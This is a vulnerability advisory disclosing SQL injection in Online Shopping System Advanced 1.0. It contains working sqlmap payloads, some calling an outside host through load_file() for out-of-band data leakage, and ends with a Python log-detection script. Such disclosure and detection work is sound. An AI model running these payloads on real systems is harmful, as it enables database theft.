Online Shopping System Advanced 1.0 SQL Injection

Online Shopping System Advanced version 1.0 suffers from multiple remote SQL injection vulnerabilities.

Packet Storm
#sql #vulnerability #git #php
The online-shopping-system-advanced-1.0 suffers from multiple SQLi.
The attacker can steal all information from the database of this system.

Status: CRITICAL

[+] Exploit:

```MYSQL
Parameter: cid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#
```

--------------------------------------------------------------------------------------------

```MYSQL
Parameter: password (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on
```

## And more:

```txt
[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]]
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]]
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]]
```

PoC:
https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
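For triage of web or WAF logs, the Python below is an added example (not part of the original advisory or the project's code) that classifies url-encoded POST bodies by the technique families listed above for the reported parameters. The regex signatures, the `classify` helper and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameters the advisory reports as injectable (action.php, login.php,
# product.php, review.php).
WATCHED = ("cid", "password", "p", "email", "name")

# One pattern per technique family in the advisory, plus the load_file() UNC
# read that prefixes the cid payloads. Assumed patterns, not a full rule set.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(or|and)\s+(not\s+)?(\d+)\s*=\s*\3\b", re.I),
    "error-based (FLOOR/RAND)": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "out-of-band file read": re.compile(r"load_file\s*\(\s*'\\\\", re.I),
}

def classify(body, watched=WATCHED):
    """Return {param: [technique, ...]} for watched params in a urlencoded body."""
    hits = {}
    # parse_qsl decodes %xx and '+' so encoded variants match the same patterns.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in watched:
            continue
        found = [label for label, rx in SIGNATURES.items() if rx.search(value)]
        if found:
            hits.setdefault(name, []).extend(found)
    return hits

# Constructed request bodies modelled on the payload shapes in the advisory.
SAMPLES = [
    "getProduct=1&setPage=1&pageNumber=1&cid=2",
    "getProduct=1&setPage=1&pageNumber=1&cid=2' OR NOT 4084=4084 AND 'a'='a",
    "getProduct=1&cid=2' AND (SELECT 1 FROM (SELECT(SLEEP(17)))t) AND 'a'='a",
    r"getProduct=1&cid=2'+(select+load_file('\\\\oob.example.test\\x'))+'",
    "getProduct=1&cid=2' UNION ALL SELECT NULL,NULL,NULL,NULL#",
    "email=user%40example.test&password=x' AND (SELECT 1 FROM(SELECT COUNT(*),"
    "CONCAT(0x71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)%23",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify(body) or "clean", "<-", body[:60])
```

Signature matching like this helps find probing in logs; the fix in the application itself is to bind these parameters through parameterized queries.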
